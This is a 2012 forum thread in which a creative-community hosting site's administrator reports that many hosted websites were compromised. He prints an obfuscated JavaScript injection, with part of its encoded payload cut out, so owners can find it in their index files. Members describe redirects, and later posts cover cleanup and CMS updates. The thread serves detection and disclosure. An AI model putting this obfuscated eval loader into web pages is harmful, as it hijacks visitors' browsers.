News: Celebrating over 10 years serving the creative community

Author Topic: HLC Hacked  (Read 3472 times)

Editor

  • Administrator
  • Gman
  • *****
  • Posts: 1947
  • Some nerd
    • Half-Life Creations
HLC Hacked
« on: January 01, 2012, 12:56:50 PM »
Just to let everyone know, multiple websites on HLC have been compromised by some kind of shell access hack. It has not attacked all websites, but a fair amount nonetheless. If your website is suffering any sort of problems, check your index files for the following code at the beginning of the page. DreamHost has determined that this is the problematic code.

Code: [Select]
<script>aa=([].slice 'hjkbghkj').substr(2-1,4);
if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm' 'e' 'n' 't'] 'evweds').substr(2-1,4);
if((aa=="func")||(aa=="unct")){ss=new String(); s=String;12-function() {e=eval; f='fromCharCode'; }();
t='k'; } ddd=new Date(); d2=new Date(ddd.valueOf()-2); h=(ddd-d2)*-1;
n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54
/.../
5k52k52.5k54k50k20k51k20.5k29.5k4.5k4.5k62.5"];
n=n[0].split(t); for(i=0; n.length-i>0; i)ss =s[f](-h*n[i]);f=ss; e(f);</script>

We are working to track down it's origins. Thanks to Bekey and the DreamHost security team, we already have a few leads. We encourage if you have a website with us to ensure your scripts and programs are updated to the latest versions.
« Last Edit: January 06, 2012, 02:01:29 PM by Bekey »

Jake

  • Black Op
  • ******
  • Posts: 327
Re: HLC Hacked
« Reply #1 on: January 01, 2012, 04:18:08 PM »
What did it do exactly? When I tried to get on earlier I would be redirected to another site.

D3ads

  • Gman
  • ******
  • Posts: 1648
  • Stoj! Opasna Zona!
    • Moddb Profile
Re: HLC Hacked
« Reply #2 on: January 03, 2012, 04:08:13 PM »
So is this all sorted then? I take it the forums weren't compromised...

Editor

  • Administrator
  • Gman
  • *****
  • Posts: 1947
  • Some nerd
    • Half-Life Creations
Re: HLC Hacked
« Reply #3 on: January 03, 2012, 05:04:42 PM »
We got it fairly bad, bare essentials are operating, but lots of stuff was busted. More info later. Bekey, message me asap.

Editor

  • Administrator
  • Gman
  • *****
  • Posts: 1947
  • Some nerd
    • Half-Life Creations
Re: HLC Hacked
« Reply #4 on: January 03, 2012, 09:18:51 PM »
For any of our hosted users, take the next few days to update any CMS systems you have on your website as we will be purging out of date ones that led to security breaches on this network.

Alex

  • For Hire A
  • Gman
  • *
  • Posts: 3951
Re: HLC Hacked
« Reply #5 on: January 06, 2012, 03:05:52 PM »
It's still ongoing?  Seriously, thanks you guys for you guys for fixing it up - sucks that so much work has to go into fixing it up =\

Editor

  • Administrator
  • Gman
  • *****
  • Posts: 1947
  • Some nerd
    • Half-Life Creations
Re: HLC Hacked
« Reply #6 on: January 08, 2012, 06:03:39 PM »
Be prepared for some significant changes for those of you that have hosted sites here, we plan to up security. More information will be provided shortly. Many sub domains that were not being used were deleted. It's very possible that if we cannot contact some of these that have out of date CMS that they will also succumb to the same fate.

D3ads

  • Gman
  • ******
  • Posts: 1648
  • Stoj! Opasna Zona!
    • Moddb Profile
Re: HLC Hacked
« Reply #7 on: January 11, 2012, 05:20:30 AM »
Thanks for being on top of this so quickly, appreciate how frustrating this must all be. I've been a bit dubious of visiting here lately just in case some things are still compromised. Is it just hosted sites that have been hit? I have avoided the main page since I saw this post...